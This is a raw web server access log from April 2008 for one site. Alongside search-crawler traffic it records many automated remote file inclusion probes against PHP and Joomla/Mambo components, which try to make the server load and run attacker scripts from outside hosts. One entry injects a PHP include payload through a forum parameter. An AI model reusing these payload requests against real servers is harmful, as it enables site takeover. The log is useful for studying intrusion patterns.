74.6.24.187 - - [08/Apr/2008:13:21:32 -0700] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:13:22:06 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:13:22:07 -0700] "GET /index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:13:22:08 -0700] "GET /logs/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.104 - - [08/Apr/2008:13:22:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.223 - - [08/Apr/2008:13:22:33 -0700] "GET /logs/access_080323.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:13:22:40 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:13:22:41 -0700] "GET /index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:13:22:41 -0700] "GET /logs/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:13:23:12 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:13:23:45 -0700] "GET /logs/access_080118.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:23:45 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:13:24:07 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:13:24:48 -0700] "GET /logs/access_080313.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.157 - - [08/Apr/2008:13:25:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.220 - - [08/Apr/2008:13:25:42 -0700] "GET /logs/access_080316.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:25:54 -0700] "GET /logs/access_080312.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:25:55 -0700] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.3.139.246 - - [08/Apr/2008:13:26:44 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.246 - - [08/Apr/2008:13:26:44 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:13:29:04 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:13:29:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.3.139.246 - - [08/Apr/2008:13:29:19 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.179.153 - - [08/Apr/2008:13:29:46 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_performs&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.179.153 - - [08/Apr/2008:13:29:47 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_performs&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.246.150.225 - - [08/Apr/2008:13:31:02 -0700] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.office-events.de/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:32:19 -0700] "GET /logs/access_080312.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:32:20 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:32:27 -0700] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:33:32 -0700] "GET /logs/access_080312.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:33:39 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:13:34:04 -0700] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.13.177 - - [08/Apr/2008:13:34:41 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.13.177 - - [08/Apr/2008:13:34:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.221.130.12 - - [08/Apr/2008:13:35:07 -0700] "GET //index.php?option=com_custompages&cpage=http://www.redladys.net/tgp/alat/idscan2? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:13:35:20 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.241.104.187 - - [08/Apr/2008:13:36:16 -0700] "GET /logs/ HTTP/1.1" 200 42265 "-" "boitho.com-dc/0.86 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:37:27 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:37:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:37:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:39:07 -0700] "GET /logs/access_080215.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:39:10 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:39:11 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:39:11 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://it.geocities.com/biglionp0wa/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:39:12 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:39:17 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://it.geocities.com/biglionp0wa/t.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.6.22.119 - - [08/Apr/2008:13:41:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.101 - - [08/Apr/2008:13:41:04 -0700] "GET /tmp/ HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.12 - - [08/Apr/2008:13:42:37 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.redladys.net/tgp/alat/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [08/Apr/2008:13:42:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.redladys.net/tgp/alat/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:13:43:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:13:43:00 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.6.19.230 - - [08/Apr/2008:13:43:06 -0700] "GET /bikes/dteel/2008_02_08/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.21.66 - - [08/Apr/2008:13:43:27 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [08/Apr/2008:13:43:29 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [08/Apr/2008:13:43:32 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.167 - - [08/Apr/2008:13:43:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.21.66 - - [08/Apr/2008:13:43:47 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:13:43:50 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:13:45:18 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:13:45:18 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 50 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:13:45:44 -0700] "GET /logs/access.log/index1.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:45:48 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:45:49 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:45:49 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:13:45:57 -0700] "GET /index1.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:13:46:09 -0700] "GET /logs/index1.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:25 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:25 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:26 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://it.geocities.com/biglionp0wa/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:26 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:28 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.196.80.130 - - [08/Apr/2008:13:46:30 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://it.geocities.com/biglionp0wa/t.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.12 - - [08/Apr/2008:13:46:31 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.redladys.net/tgp/alat/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.246 - - [08/Apr/2008:13:46:39 -0700] "GET /bikes/dteel/2008_02_08/?S=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:46:44 -0700] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:13:46:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.57 - - [08/Apr/2008:13:47:16 -0700] "GET /tmp/sess_29925d9d42c7465d9218fa20f2cccf3d HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:47:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:47:34 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:47:35 -0700] "GET //main.php?sayfa=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:47:35 -0700] "GET /logs//main.php?sayfa=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:47:59 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:31 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:32 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?a=1&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:33 -0700] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:34 -0700] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?a=1&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:49:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?a=1&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.93 - - [08/Apr/2008:13:50:14 -0700] "GET /minamijewelry/source_images/?M=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:16 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:16 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:24 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:24 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:50:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:13:50:36 -0700] "GET /logs/access_080308.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:13:50:40 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:13:50:56 -0700] "GET /logs/access_080215.log//mcf.php?content=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:50:57 -0700] "GET //mcf.php?content=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:50:58 -0700] "GET /logs//mcf.php?content=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:13:51:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:13:51:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:13:51:17 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:13:51:17 -0700] "GET /index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:13:51:18 -0700] "GET /logs/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
